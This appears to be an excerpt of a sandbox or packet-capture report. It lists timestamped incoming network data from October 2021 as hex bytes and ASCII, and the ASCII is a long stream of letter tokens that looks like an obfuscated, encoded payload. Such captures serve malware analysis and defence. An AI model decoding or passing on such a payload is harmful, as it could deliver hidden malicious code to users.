2021-10-29 18:50:00 UTC	271	IN	Data Raw: 44 58 20 71 4f 4d 20 71 71 4a 20 6d 4d 20 45 44 20 57 4f 20 57 6d 20 4d 71 20 70 4d 20 71 71 45 20 70 57 20 71 71 4a 20 71 4a 71 20 6d 58 20 71 4a 6d 20 57 6d 20 70 20 71 71 6d 20 57 58 20 71 4f 4d 20 44 4a 20 57 4f 20 6d 58 20 71 71 57 20 71 71 45 20 58 6d 20 4a 45 20 71 71 45 20 6d 4f 20 71 71 4a 20 4f 20 6d 58 20 71 71 4a 20 57 6d 20 6d 57 20 71 71 6d 20 4a 44 20 71 4f 4d 20 70 4f 20 57 4f 20 71 4f 4a 20 57 4f 20 71 4f 4f 20 58 6d 20 70 4d 20 71 71 45 20 70 4d 20 71 71 4a 20 71 4a 4f 20 6d 58 20 4d 6d 20 57 6d 20 57 57 20 71 71 6d 20 44 4a 20 71 4f 4d 20 57 4d 20 57 4f 20 45 6d 20 57 4f 20 71 71 4d 20 58 6d 20 57 45 20 71 71 45 20 57 58 20 71 71 4a 20 58 57 20 6d 58 20 58 4d 20 57 6d 20 6d 6d 20 71 71 6d 20 44 4f 20 71 4f 4d 20 4a 45 20 57 4f 20 71 4f Data Ascii: DX qOM qqJ mM ED WO Wm Mq pM qqE pW qqJ qJq mX qJm Wm p qqm WX qOM DJ WO mX qqW qqE Xm JE qqE mO qqJ O mX qqJ Wm mW qqm JD qOM pO WO qOJ WO qOO Xm pM qqE pM qqJ qJO mX Mm Wm WW qqm DJ qOM WM WO Em WO qqM Xm WE qqE WX qqJ XW mX XM Wm mm qqm DO qOM JE WO qO
2021-10-29 18:50:00 UTC	287	IN	Data Raw: 4f 71 20 71 4f 58 20 71 71 70 20 70 4d 20 70 6d 20 70 71 20 57 57 20 45 6d 20 71 71 6d 20 4d 44 20 71 4a 45 20 4a 6d 4f 20 71 57 71 20 6d 4d 20 6d 6d 20 57 6d 20 4d 70 20 71 71 45 20 71 71 44 20 71 4a 4f 20 4d 58 20 70 71 20 6d 4d 20 70 4a 20 71 58 70 20 58 6d 20 71 4a 70 20 71 71 6d 20 71 4f 58 20 71 4f 71 20 70 4a 20 4a 4d 20 57 71 20 70 44 20 4a 71 4a 20 71 58 44 20 71 4a 44 20 71 4f 44 20 71 71 6d 20 70 4a 20 71 4f 4f 20 70 4d 20 70 44 20 71 4a 71 20 71 71 57 20 71 4f 70 20 4a 70 44 20 71 71 4a 20 57 57 20 57 58 20 57 71 20 70 44 20 4a 71 70 20 71 71 6d 20 71 71 4a 20 71 4f 44 20 71 71 70 20 70 4a 20 71 45 45 20 71 4a 44 20 71 4d 20 58 70 20 71 4a 4a 20 4d 44 20 71 4a 45 20 4d 70 20 57 71 20 70 6d 20 71 45 4d 20 57 6d 20 44 57 20 4d 44 20 44 6d 20 71 Data Ascii: Oq qOX qqp pM pm pq WW Em qqm MD qJE JmO qWq mM mm Wm Mp qqE qqD qJO MX pq mM pJ qXp Xm qJp qqm qOX qOq pJ JM Wq pD JqJ qXD qJD qOD qqm pJ qOO pM pD qJq qqW qOp JpD qqJ WW WX Wq pD Jqp qqm qqJ qOD qqp pJ qEE qJD qM Xp qJJ MD qJE Mp Wq pm qEM Wm DW MD Dm q
2021-10-29 18:50:00 UTC	303	IN	Data Raw: 58 20 71 45 58 20 71 6d 4d 20 57 71 20 70 44 20 4a 71 4a 20 4a 71 58 20 71 4a 6d 20 44 4d 20 71 71 4a 20 70 4d 20 70 6d 20 70 20 57 57 20 45 4f 20 4a 6d 4a 20 71 44 71 20 71 4f 4f 20 58 58 20 57 4f 20 70 45 20 70 4a 20 45 20 58 57 20 4d 44 20 4a 6d 57 20 71 44 4d 20 71 4a 71 20 4a 44 20 6d 58 20 70 4d 20 70 44 20 71 4f 71 20 71 71 57 20 71 4f 70 20 4a 70 45 20 71 44 4f 20 57 4d 20 4a 6d 20 57 4f 20 70 57 20 45 4f 20 44 45 20 71 71 44 20 71 4a 45 20 4a 6d 4f 20 4a 57 6d 20 57 71 20 4a 44 20 57 6d 20 4d 6d 20 71 4a 70 20 4d 70 20 71 4f 4d 20 71 4f 71 20 70 4a 20 4a 4d 20 57 71 20 70 44 20 4a 71 4a 20 71 4d 6d 20 71 4a 6d 20 44 4d 20 71 71 4a 20 70 4d 20 70 6d 20 70 71 20 57 57 20 45 4f 20 4a 6d 4a 20 71 6d 71 20 71 4f 4f 20 58 58 20 57 4f 20 70 45 20 70 4a Data Ascii: X qEX qmM Wq pD JqJ JqX qJm DM qqJ pM pm p WW EO JmJ qDq qOO XX WO pE pJ E XW MD JmW qDM qJq JD mX pM pD qOq qqW qOp JpE qDO WM Jm WO pW EO DE qqD qJE JmO JWm Wq JD Wm Mm qJp Mp qOM qOq pJ JM Wq pD JqJ qMm qJm DM qqJ pM pm pq WW EO JmJ qmq qOO XX WO pE pJ
2021-10-29 18:50:00 UTC	319	IN	Data Raw: 4d 20 57 6d 20 57 4f 20 45 6d 20 57 4f 20 71 4f 58 20 58 6d 20 70 57 20 71 71 45 20 4a 4d 20 71 71 4a 20 4d 57 20 6d 58 20 58 70 20 57 6d 20 71 4d 20 71 71 6d 20 44 70 20 71 4f 4d 20 44 20 57 4f 20 58 71 20 57 4f 20 71 71 70 20 58 6d 20 70 4f 20 71 71 45 20 4a 57 20 71 71 4a 20 71 4f 45 20 6d 58 20 71 4f 71 20 57 6d 20 4a 20 71 71 6d 20 44 20 71 4f 4d 20 6d 71 20 57 4f 20 4d 70 20 57 4f 20 71 57 20 58 6d 20 4a 4d 20 71 71 45 20 71 6d 20 71 71 4a 20 71 71 45 20 6d 58 20 44 44 20 57 6d 20 44 71 20 71 71 6d 20 6d 6d 20 71 4f 4d 20 4a 4d 20 57 4f 20 45 4a 20 57 4f 20 4d 70 20 58 6d 20 6d 70 20 71 71 45 20 4d 57 20 71 71 4a 20 45 20 6d 58 20 4d 4a 20 57 6d 20 71 70 20 71 71 6d 20 45 71 20 71 4f 4d 20 44 4d 20 57 4f 20 58 58 20 57 4f 20 58 57 20 58 6d 20 57 70 Data Ascii: M Wm WO Em WO qOX Xm pW qqE JM qqJ MW mX Xp Wm qM qqm Dp qOM D WO Xq WO qqp Xm pO qqE JW qqJ qOE mX qOq Wm J qqm D qOM mq WO Mp WO qW Xm JM qqE qm qqJ qqE mX DD Wm Dq qqm mm qOM JM WO EJ WO Mp Xm mp qqE MW qqJ E mX MJ Wm qp qqm Eq qOM DM WO XX WO XW Xm Wp
2021-10-29 18:50:00 UTC	335	IN	Data Raw: 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f Data Ascii: qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO
2021-10-29 18:50:00 UTC	351	IN	Data Raw: 71 6d 20 4a 20 4f 20 6d 4f 20 45 20 4f 20 4f 20 44 20 4f 20 4f 20 4f 20 4f 20 4f 20 70 4a 20 45 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 4a 57 6d 20 71 4a 20 70 20 4f 20 4a 57 6d 20 71 6d 20 4a 57 20 4f 20 4a 57 6d 20 71 4a 20 4a 57 20 4f 20 57 45 20 71 44 58 20 4f 20 4f 20 4f 20 70 4a 20 45 71 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 44 20 4f 20 70 4a 20 45 4a 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 70 4a 20 71 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 45 20 4f 20 70 4a 20 45 70 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 4a 57 6d 20 71 4a 20 58 20 4f 20 4a 57 6d 20 71 4a 20 4d 20 4f 20 6d 4f 20 71 4a 20 4f 20 4f 20 44 20 4a 57 6d 20 71 6d 20 Data Ascii: qm J O mO E O O D O O O O O pJ EO O O O JWm qm J O JWm qJ p O JWm qm JW O JWm qJ JW O WE qDX O O O pJ Eq O O O JWm qm J O pJ O O O O JWm qm JD O pJ EJ O O O JWm qm J O pJ q O O O JWm qm JE O pJ Ep O O O JWm qm J O JWm qJ X O JWm qJ M O mO qJ O O D JWm qm
2021-10-29 18:50:00 UTC	367	IN	Data Raw: 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 71 4f 44 20 4a 57 6d 20 4a 57 57 20 4a 57 57 20 4a 4a 71 20 6d 4d 20 4f 20 4f 20 4f 20 71 71 45 20 70 4a 20 4f 20 4f 20 71 20 4a 4f 20 4a 57 6d 20 70 20 4a 57 6d 20 71 4a 20 71 20 4f 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 70 20 4d 57 20 4a 57 6d 20 71 4a 20 4a 20 4f 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 20 4d 57 20 4a 57 6d 20 71 45 20 71 71 44 20 70 4a 20 4f 20 4f 20 71 20 6d 4f 20 4d 20 4f 20 4f 20 71 4f 20 4a 4a 71 20 71 57 70 20 4a 57 57 20 4a 57 57 20 4a 57 57 20 70 4a 20 57 71 20 4f 20 71 4f 20 71 4a 58 20 6d 4f 20 71 4f 20 4f 20 4f 20 71 4f 20 71 4a 4a 20 4a 57 6d 20 71 4a 20 4a 20 4f 20 57 45 20 44 20 4f 20 4f 20 4f 20 6d 4f 20 45 20 4f 20 4f 20 71 4f 20 4f 20 4a 57 6d 20 71 4a 20 4f 20 4f Data Ascii: O O O O O O qOD JWm JWW JWW JJq mM O O O qqE pJ O O q JO JWm p JWm qJ q O pJ O O O O JWm p MW JWm qJ J O pJ O O O O JWm q MW JWm qE qqD pJ O O q mO M O O qO JJq qWp JWW JWW JWW pJ Wq O qO qJX mO qO O O qO qJJ JWm qJ J O WE D O O O mO E O O qO O JWm qJ O O
2021-10-29 18:50:00 UTC	383	IN	Data Raw: 4f 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 70 71 20 57 70 20 71 57 45 20 70 45 20 4a 4a 20 70 71 20 4d 45 20 71 57 45 20 71 71 57 20 71 58 45 20 4f 20 4f 20 71 4f 20 6d 4a 20 71 4d 20 6d 58 20 6d 20 4f 20 71 57 4f 20 4f 20 4f 20 4f 20 70 20 4f 20 4f 20 71 45 20 4a 58 20 71 6d 71 20 71 70 44 20 4f 20 4f 20 71 20 70 45 20 70 4a 20 57 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 57 20 4f 20 4f 20 4f 20 70 71 20 4d 45 20 71 57 45 20 70 45 20 4a 45 20 70 71 20 71 4f 4a 20 71 57 45 20 70 45 20 70 4a 20 6d 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 6d 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 4a 44 20 70 71 20 71 4f 58 20 71 57 45 20 70 45 Data Ascii: O O O O pq WD qWE pE pJ O O O O pq Wp qWE pE JJ pq ME qWE qqW qXE O O qO mJ qM mX m O qWO O O O p O O qE JX qmq qpD O O q pE pJ W O O O pq qOq qWE pE pJ W O O O pq ME qWE pE JE pq qOJ qWE pE pJ m O O O pq WE qWE pE pJ m O O O pq Wm qWE pE JD pq qOX qWE pE
2021-10-29 18:50:00 UTC	399	IN	Data Raw: 4f 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 70 4f 20 4f 20 4f 20 4f 20 70 71 20 6d 4d 20 71 57 45 20 70 45 20 70 71 20 70 4f 20 70 71 20 6d 44 20 71 57 45 20 70 45 20 70 4a 20 4a 4d 20 4f 20 4f 20 4f 20 70 71 20 6d 58 20 71 57 45 20 70 45 20 70 4a 20 4a 4d 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 71 20 4a 4d 20 70 71 20 71 71 57 20 71 57 45 20 70 45 20 70 4a 20 4a 58 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 4a 58 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 71 20 4a 58 20 70 71 20 71 71 44 20 71 57 45 20 70 45 20 70 4a 20 4a 45 20 4f 20 4f 20 4f 20 70 71 20 4d 58 20 71 57 45 20 70 45 20 70 4a 20 4a 45 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 Data Ascii: O O O O pq qOq qWE pE pJ pO O O O pq mM qWE pE pq pO pq mD qWE pE pJ JM O O O pq mX qWE pE pJ JM O O O pq WD qWE pE pq JM pq qqW qWE pE pJ JX O O O pq WO qWE pE pJ JX O O O pq qOq qWE pE pq JX pq qqD qWE pE pJ JE O O O pq MX qWE pE pJ JE O O O pq Wm qWE p
2021-10-29 18:50:00 UTC	415	IN	Data Raw: 4a 4f 20 4f 20 4f 20 4f 20 70 20 4f 20 4f 20 71 45 20 70 71 20 4d 20 71 6d 71 20 71 70 44 20 4f 20 4f 20 71 20 70 45 20 70 4a 20 58 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 4a 20 58 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4f 20 70 71 20 71 4f 58 20 71 57 45 20 70 45 20 70 4a 20 45 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 70 4a 20 45 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 4a 4d 20 70 71 20 71 4f 58 20 71 57 45 20 70 45 20 70 4a 20 44 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 44 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 4a 58 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 4a 20 57 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 Data Ascii: JO O O O p O O qE pq M qmq qpD O O q pE pJ X O O O pq qOO qWE pE pJ X O O O pq WO qWE pE pO pq qOX qWE pE pJ E O O O pq Wm qWE pE pJ E O O O pq WJ qWE pE JM pq qOX qWE pE pJ D O O O pq qOq qWE pE pJ D O O O pq qOO qWE pE JX pq qOO qWE pE pJ W O O O pq Wm
2021-10-29 18:50:00 UTC	431	IN	Data Raw: 4f 20 4f 20 4f 20 70 71 20 4d 45 20 71 57 45 20 70 45 20 70 71 20 57 4a 20 70 71 20 44 57 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 4d 58 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 70 71 20 57 71 20 70 71 20 70 4a 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4a 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 Data Ascii: O O O pq ME qWE pE pq WJ pq DW qWE pE pJ Wq O O O pq WD qWE pE pJ Wq O O O pq WJ qWE pE pJ Wq O O O pq MX qWE pE pJ Wq O O O pq WJ qWE pE pq Wq pq pJ qWE pE pJ WO O O O pq qOJ qWE pE pJ WO O O O pq WE qWE pE pJ WO O O O pq WO qWE pE pJ WO O O O pq qOO qWE
2021-10-29 18:50:00 UTC	447	IN	Data Raw: 20 58 58 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 58 45 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 58 45 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 4a 20 58 45 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 70 4a 20 58 45 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 71 20 58 45 20 70 71 20 71 71 4a 20 71 57 45 20 70 45 20 70 4a 20 58 44 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4a 20 71 57 45 20 70 45 20 70 4a 20 58 44 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 58 44 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 58 44 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 71 20 58 44 20 70 71 20 71 71 71 20 71 Data Ascii: XX pq qOq qWE pE pJ XE O O O pq WO qWE pE pJ XE O O O pq WD qWE pE pJ XE O O O pq Wm qWE pE pJ XE O O O pq qOO qWE pE pq XE pq qqJ qWE pE pJ XD O O O pq qOJ qWE pE pJ XD O O O pq WE qWE pE pJ XD O O O pq WE qWE pE pJ XD O O O pq qOq qWE pE pq XD pq qqq q
2021-10-29 18:50:00 UTC	463	IN	Data Raw: 57 45 20 70 45 20 70 71 20 70 44 20 70 71 20 71 71 71 20 71 57 45 20 70 45 20 70 4a 20 70 57 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 70 57 20 4f 20 4f 20 4f 20 70 71 20 6d 58 20 71 57 45 20 70 45 20 70 4a 20 70 57 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 70 57 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 71 20 70 57 20 70 71 20 70 4a 20 71 57 45 20 70 45 20 70 4a 20 70 6d 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 4a 20 70 6d 20 4f 20 4f 20 4f 20 70 71 20 4d 4d 20 71 57 45 20 70 45 20 70 4a 20 70 6d 20 4f 20 4f 20 4f 20 70 71 20 57 57 20 71 57 45 20 70 45 20 70 4a 20 70 6d 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 71 20 70 6d 20 70 71 20 71 Data Ascii: WE pE pq pD pq qqq qWE pE pJ pW O O O pq WO qWE pE pJ pW O O O pq mX qWE pE pJ pW O O O pq WO qWE pE pJ pW O O O pq WO qWE pE pq pW pq pJ qWE pE pJ pm O O O pq WD qWE pE pJ pm O O O pq MM qWE pE pJ pm O O O pq WW qWE pE pJ pm O O O pq WE qWE pE pq pm pq q
2021-10-29 18:50:00 UTC	479	IN	Data Raw: 44 20 4f 20 4a 4f 4f 20 44 20 4a 71 57 20 70 71 20 4d 20 4f 20 6d 20 4f 20 70 44 20 4f 20 71 20 4f 20 71 44 20 4f 20 71 4d 71 20 71 57 20 4a 4f 71 20 70 4d 20 4d 20 4f 20 44 20 4f 20 6d 4f 20 4f 20 71 20 4f 20 71 44 20 4f 20 71 4f 6d 20 70 4d 20 71 44 4d 20 4f 20 4d 20 4f 20 45 20 4f 20 6d 57 20 4f 20 71 20 4f 20 4f 20 4f 20 4a 70 6d 20 4a 6d 20 71 44 4d 20 4f 20 4d 20 4f 20 4d 20 4f 20 6d 45 20 4f 20 4f 20 4f 20 71 44 20 4f 20 71 70 57 20 70 4a 20 71 44 4d 20 4f 20 4d 20 4f 20 4d 20 4f 20 44 44 20 4f 20 71 4a 4d 20 71 20 71 44 20 4f 20 71 4a 20 71 6d 20 71 44 4d 20 4f 20 4d 20 4f 20 4d 20 4f 20 44 45 20 4f 20 71 70 4f 20 71 20 71 44 20 4f 20 4a 4f 4d 20 4d 20 4f 20 4f 20 4d 20 4f 20 71 70 20 4f 20 44 4d 20 4f 20 71 4f 20 71 20 71 45 20 4f 20 71 6d 4f 20 Data Ascii: D O JOO D JqW pq M O m O pD O q O qD O qMq qW JOq pM M O D O mO O q O qD O qOm pM qDM O M O E O mW O q O O O Jpm Jm qDM O M O M O mE O O O qD O qpW pJ qDM O M O M O DD O qJM q qD O qJ qm qDM O M O M O DE O qpO q qD O JOM M O O M O qp O DM O qO q qE O qmO
2021-10-29 18:50:00 UTC	495	IN	Data Raw: 4f 20 4a 20 4f 20 71 4f 58 20 57 20 4f 20 4f 20 71 20 4f 20 71 71 20 71 70 20 4f 20 4f 20 4a 20 4f 20 71 45 58 20 6d 71 20 4f 20 4f 20 70 20 4f 20 71 70 4a 20 71 45 20 4f 20 4f 20 6d 20 4f 20 71 44 45 20 6d 4f 20 4f 20 4f 20 57 20 4f 20 57 57 20 6d 45 20 4f 20 4f 20 44 20 4f 20 58 4a 20 4a 58 20 4f 20 4f 20 45 20 4f 20 57 4d 20 4a 4f 20 4f 20 4f 20 58 20 4f 20 4a 70 58 20 71 70 20 4f 20 4f 20 4d 20 4f 20 4a 70 4d 20 4a 4d 20 4f 20 4f 20 71 4f 20 4f 20 6d 71 20 70 57 20 4a 20 4f 20 71 71 20 4f 20 71 6d 58 20 6d 70 20 4f 20 4f 20 71 4a 20 4f 20 71 4a 71 20 71 70 20 4f 20 4f 20 71 20 4f 20 71 57 4a 20 6d 4f 20 4f 20 4f 20 4a 20 4f 20 71 58 4a 20 6d 20 4f 20 4f 20 71 20 4f 20 71 58 70 20 70 45 20 4f 20 4f 20 4a 20 4f 20 71 58 20 4a 70 20 4f 20 4f 20 71 20 4f Data Ascii: O J O qOX W O O q O qq qp O O J O qEX mq O O p O qpJ qE O O m O qDE mO O O W O WW mE O O D O XJ JX O O E O WM JO O O X O JpX qp O O M O JpM JM O O qO O mq pW J O qq O qmX mp O O qJ O qJq qp O O q O qWJ mO O O J O qXJ m O O q O qXp pE O O J O qX Jp O O q O
2021-10-29 18:50:00 UTC	511	IN	Data Raw: 71 20 71 4f 4f 20 4f 20 44 45 20 71 71 71 20 71 71 4f 20 71 71 44 20 71 71 6d 20 4d 45 20 4d 4d 20 71 71 44 20 71 4f 71 20 71 4f 4f 20 4f 20 4d 4d 20 71 71 71 20 71 4f 58 20 71 4f 58 20 71 4f 71 20 4d 4d 20 71 71 44 20 71 4f 71 20 71 4f 4f 20 4f 20 58 4a 20 71 4f 71 20 71 4f 4f 20 71 71 6d 20 4d 45 20 71 4f 4a 20 71 71 44 20 71 4f 71 20 71 4f 4f 20 4f 20 71 4f 70 20 71 4f 71 20 71 71 44 20 4d 57 20 45 4a 20 4d 45 20 71 71 57 20 44 4d 20 71 4a 4f 20 71 4f 57 20 71 71 44 20 71 4f 71 20 71 4f 4f 20 4f 20 71 71 4f 20 71 71 71 20 71 71 4f 20 71 4f 57 20 71 71 4f 20 71 4f 4a 20 71 4f 71 20 71 71 57 20 71 71 44 20 71 4f 71 20 71 4f 4f 20 4f 20 44 44 20 4d 45 20 4d 4d 20 71 4f 45 20 71 4f 4a 20 71 4f 57 20 71 71 44 20 71 71 44 20 71 4f 71 20 71 4f 4f 20 4f 20 58 Data Ascii: q qOO O DE qqq qqO qqD qqm ME MM qqD qOq qOO O MM qqq qOX qOX qOq MM qqD qOq qOO O XJ qOq qOO qqm ME qOJ qqD qOq qOO O qOp qOq qqD MW EJ ME qqW DM qJO qOW qqD qOq qOO O qqO qqq qqO qOW qqO qOJ qOq qqW qqD qOq qOO O DD ME MM qOE qOJ qOW qqD qqD qOq qOO O X
2021-10-29 18:50:00 UTC	527	IN	Data Raw: 71 20 4d 4d 20 71 71 44 20 71 4f 57 20 71 71 71 20 71 71 4f 20 4f 20 45 71 20 71 4f 71 20 71 71 44 20 45 71 20 71 4f 71 20 71 71 4f 20 71 4f 71 20 71 71 6d 20 71 4f 57 20 4d 4d 20 58 6d 20 71 4a 71 20 71 71 4a 20 71 4f 71 20 44 58 20 71 4f 71 20 71 4f 4a 20 71 4f 57 20 71 71 4f 20 71 4f 57 20 71 71 44 20 71 4f 57 20 71 71 71 20 71 71 4f 20 4f 20 44 45 20 4d 45 20 71 4f 58 20 71 4f 58 20 71 4f 57 20 71 71 4f 20 71 4f 70 20 44 45 20 71 71 71 20 71 71 4f 20 71 71 58 20 71 4f 71 20 71 71 4f 20 71 71 44 20 71 4f 57 20 71 71 71 20 71 71 4f 20 4f 20 58 70 20 71 4f 71 20 4d 45 20 71 71 6d 20 4d 4d 20 71 4f 6d 20 45 4d 20 71 71 4a 20 71 71 44 20 71 4f 57 20 71 71 71 20 71 71 4f 20 4f 20 44 58 20 71 71 6d 20 71 4f 57 20 71 71 58 20 71 4f 71 20 45 58 20 71 71 71 20 Data Ascii: q MM qqD qOW qqq qqO O Eq qOq qqD Eq qOq qqO qOq qqm qOW MM Xm qJq qqJ qOq DX qOq qOJ qOW qqO qOW qqD qOW qqq qqO O DE ME qOX qOX qOW qqO qOp DE qqq qqO qqX qOq qqO qqD qOW qqq qqO O Xp qOq ME qqm MM qOm EM qqJ qqD qOW qqq qqO O DX qqm qOW qqX qOq EX qqq
2021-10-29 18:50:00 UTC	543	IN	Data Raw: 20 4d 45 20 71 71 4f 20 71 71 44 20 71 71 57 20 4f 20 71 4f 44 20 71 71 45 20 71 71 6d 20 4d 45 20 71 71 4f 20 71 71 44 20 71 71 57 20 4f 20 45 70 20 71 71 4f 20 71 71 44 20 71 4f 71 20 71 71 6d 20 71 71 4f 20 4d 45 20 71 4f 58 20 6d 44 20 58 4a 20 71 71 45 20 71 71 4f 20 71 71 44 20 71 4f 57 20 71 4f 4d 20 71 4f 71 20 6d 44 20 44 57 20 71 71 45 20 71 4f 70 20 71 4f 4d 20 71 4f 71 20 71 71 4f 20 71 71 44 20 71 71 57 20 4f 20 44 4d 20 71 71 4f 20 4d 4d 20 71 71 6d 20 71 71 71 20 4d 45 20 4d 4d 20 71 4f 6d 20 71 4f 4d 20 71 4f 71 20 71 71 4f 20 71 71 44 20 71 71 57 20 4f 20 71 71 57 20 71 4f 71 20 71 71 44 20 4d 57 20 44 57 20 71 71 6d 20 71 4f 70 20 71 71 45 20 71 4f 4d 20 71 4f 71 20 71 71 4f 20 71 71 44 20 71 71 57 20 4f 20 45 71 20 71 4f 71 20 71 71 44 Data Ascii: ME qqO qqD qqW O qOD qqE qqm ME qqO qqD qqW O Ep qqO qqD qOq qqm qqO ME qOX mD XJ qqE qqO qqD qOW qOM qOq mD DW qqE qOp qOM qOq qqO qqD qqW O DM qqO MM qqm qqq ME MM qOm qOM qOq qqO qqD qqW O qqW qOq qqD MW DW qqm qOp qqE qOM qOq qqO qqD qqW O Eq qOq qqD
2021-10-29 18:50:00 UTC	559	IN	Data Raw: 44 58 20 4f 20 45 4a 20 4f 20 58 57 20 4f 20 4d 4f 20 4f 20 71 4f 44 20 4f 20 58 4d 20 4f 20 58 4d 20 4f 20 6d 70 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 57 4f 20 4f 20 44 4d 20 4f 20 45 4d 20 4f 20 71 4f 6d 20 4f 20 71 71 6d 20 4f 20 58 4f 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 45 20 4f 20 58 44 20 4f 20 71 4f 45 20 4f 20 71 4a 4a 20 4f 20 71 71 4d 20 4f 20 44 4d 20 4f 20 44 58 20 4f 20 71 71 4a 20 4f 20 57 4a 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 4d 45 20 4f 20 44 58 20 4f 20 58 4f 20 4f 20 58 6d 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 Data Ascii: DX O EJ O XW O MO O qOD O XM O XM O mp O DW O qOp O DW O DW O 